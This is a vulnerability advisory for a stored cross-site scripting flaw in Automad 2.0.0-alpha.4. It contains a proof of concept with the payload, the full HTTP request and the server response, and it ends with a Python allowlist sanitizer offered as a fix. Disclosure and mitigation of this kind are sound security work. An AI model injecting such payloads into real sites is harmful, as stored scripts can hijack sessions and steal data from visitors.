Automad 2.0.0-alpha.4 Cross Site Scripting

Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

Packet Storm
# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
# Date: 20-06-2024
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://automad.org
# Software Link: https://github.com/marcantondahmen/automad
# Category: Web Application [Flat File CMS]
# Version: 2.0.0-alpha.4
# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

# Description

A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. It enables an attacker with access to the dashboard editor to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the affected page. This can result in session hijacking, data theft, and other malicious activities.

# Proof-of-Concept

*Step-1:* Login as Admin & navigate to the endpoint http://localhost/dashboard/home

*Step-2:* There will be a default Welcome page. You will find an option to edit it.

*Step-3:* Navigate to the Content tab or http://localhost/dashboard/page?url=%2F&section=text and edit the block named `Main`.

*Step-4:* Enter the XSS payload: <img src=x onerror=alert(1)>

*Request:*

POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

*Response:*

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}

*Step-5:* The XSS triggers when you visit the homepage: http://localhost/
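The root cause described above is that the `text` field of a paragraph block is stored and rendered as raw HTML, so an `onerror` handler on an `<img>` tag survives the round trip through the `/_api/page/data` endpoint. The following is an added example, not Automad's code and not part of the advisory, of the server-side check a CMS should apply to such block data before persisting it: walk the submitted `__json__` structure (its shape is taken from the request above), and pass every block `text` through an allowlist sanitizer that keeps only harmless inline formatting, drops every other tag while keeping its inner text, and strips all attributes except a scheme-checked `href`. The allowed tag set and the sample payload are my own choices, and the sample JSON is a constructed, abbreviated copy of the request body.

```python
import json
from html import escape
from html.parser import HTMLParser

# Inline formatting a paragraph block may legitimately contain (assumed set).
ALLOWED_TAGS = {"b", "i", "em", "strong", "code", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


def _safe_href(value: str) -> bool:
    """Accept only http(s), site-relative and fragment links; rejects javascript: and data: URLs."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "/", "#"))


class _AllowlistSanitizer(HTMLParser):
    """Re-serialises an HTML fragment, keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop <img>, <script>, <h1>, ... but keep any inner text
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # every on* handler and unknown attribute is discarded here
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so decoded entities cannot smuggle a new tag back in.
        self.out.append(escape(data, quote=False))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_html(fragment: str) -> str:
    """Return the fragment with only allowlisted inline markup left in place."""
    p = _AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


def sanitize_page_data(payload: dict) -> dict:
    """Sanitize every block 'text' field in a __json__ page payload, in place.

    The structure (data -> '+field' -> blocks[] -> data.text) mirrors the
    request body shown in the advisory; field names other than that are assumed.
    """
    for field in payload.get("data", {}).values():
        if isinstance(field, dict) and isinstance(field.get("blocks"), list):
            for block in field["blocks"]:
                block_data = block.get("data")
                if isinstance(block_data, dict) and isinstance(block_data.get("text"), str):
                    block_data["text"] = sanitize_html(block_data["text"])
    return payload


# Constructed, abbreviated copy of the advisory's __json__ body (block ids shortened).
SAMPLE_JSON = (
    '{"data":{"title":"Welcome","+main":{"blocks":[{"id":"blk1","type":"paragraph",'
    '"data":{"text":"You have successfully installed Automad 2.<br><br>'
    '<img src=x onerror=alert(1)><br>","large":false}}]}},"url":"/"}'
)


def sanitized_main_text(raw_json: str = SAMPLE_JSON) -> str:
    """Parse a submitted payload, sanitize it, and return the first +main block text."""
    payload = sanitize_page_data(json.loads(raw_json))
    return payload["data"]["+main"]["blocks"][0]["data"]["text"]


if __name__ == "__main__":
    print(sanitized_main_text())
```

Applied at the point where `/_api/page/data` accepts the `__json__` field, this turns the stored text into `You have successfully installed Automad 2.<br><br><br>`: the line breaks survive, the `<img>` element and its `onerror` handler do not. Output encoding at render time is the complementary control; sanitizing on write is what prevents the payload from ever reaching the flat files. Note that Python's `html.parser` tolerates malformed markup, so the allowlist, not the parser, is what provides the guarantee.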
